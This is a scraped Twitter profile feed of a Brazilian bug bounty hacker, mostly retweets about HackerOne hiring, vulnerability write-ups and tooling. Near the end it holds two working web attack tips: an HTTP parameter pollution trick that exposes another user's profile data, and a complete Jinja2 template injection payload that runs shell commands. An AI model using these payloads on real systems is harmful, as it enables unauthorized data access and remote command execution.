kpixaba
959 posts

kpixaba
@kpixaba_bsb
In the end, I became the guy my parents used to warn me about. Hacking, Shooting, Brewing Beer and Riding old Jeeps! Opinions are my own.
Florianopolis, Joined October 2009
414 Following, 381 Followers

@NahamSec @Hacker0x01 We will miss you mate! I’ll be cheering for you on your future adventure!

This Friday is my last day at @Hacker0x01. The last 6 years have been incredible. I learned a lot of valuable lessons and met a ton of amazing people.
To celebrate I wanted to share the 6 things I learned from my time at h1.
nahamsec.com/posts/6-valuab…
kpixaba retweeted

Not only in the U.S. In BR too...
Patrik Grobshäuser @ITSecurityguard
We are hiring U.S. 🇺🇸 Security Analysts for the Triage Team at @Hacker0x01! 100% remote DM me if you have any questions Submit your Application on the link below 👇 jobs.lever.co/hackerone/5564… #infosec #bugbountytips #infosecjobs RT would be appreciated ♻️❤️
kpixaba retweeted

$50,000 @Apple RCE technical write up by @rootxharsh and @iamnoooob - github.com/httpvoid/write… - probably will have a CVE assigned for the underlying issue with Lucee. Very nice bug! 🔐

Awesome!
Jobert Abma @jobertabma
I found a Windows only path traversal in OpenSSL s_server: hackerone.com/reports/850775. It's uncommon for OpenSSL s_server to run this configuration on the web, but a nice little find regardless. h/t to @kpixaba_bsb who helped me out to reproduce this since I don't have MS Windows!
kpixaba retweeted

I didn't get a bug in, but I'm one of three winners of the meme bonus for #h12010 open. That has to be just as prestigious as the Most Valuable Hacker award, right? Thanks @TheParanoids and @Hacker0x01!

kpixaba retweeted

HackerOne is hiring Security Analysts in the US
Things you should add to your CV/Resume:
+ Your Bug Bounty Profile(s)
+ CVEs
+ Research / Papers
+ Blogposts
+ Github Repositories
+ Open Source contribution
See you in the practical interviews! 😉
jobs.lever.co/hackerone/8747…
kpixaba retweeted

ysoserial.net v1.33 released with a ton of new features. Thanks to @irsdl for the great PRs! You can see what's new here mdsec.co.uk/2020/04/introd…
kpixaba retweeted

/api/v1/users/profile?id=MYID -> HTTP 200 with my data
/api/v1/users/profile?id=ANOTHERUSERID -> HTTP 401
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 with my data and the other user's data 👀
Crit bounty awarded #bugbountytips #bugbounty @Hacker0x01
kpixaba retweeted

I improved the #PayloadAllTheThings Jinja2 SSTI command execution payload.
/?cmd={% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}&input=ls








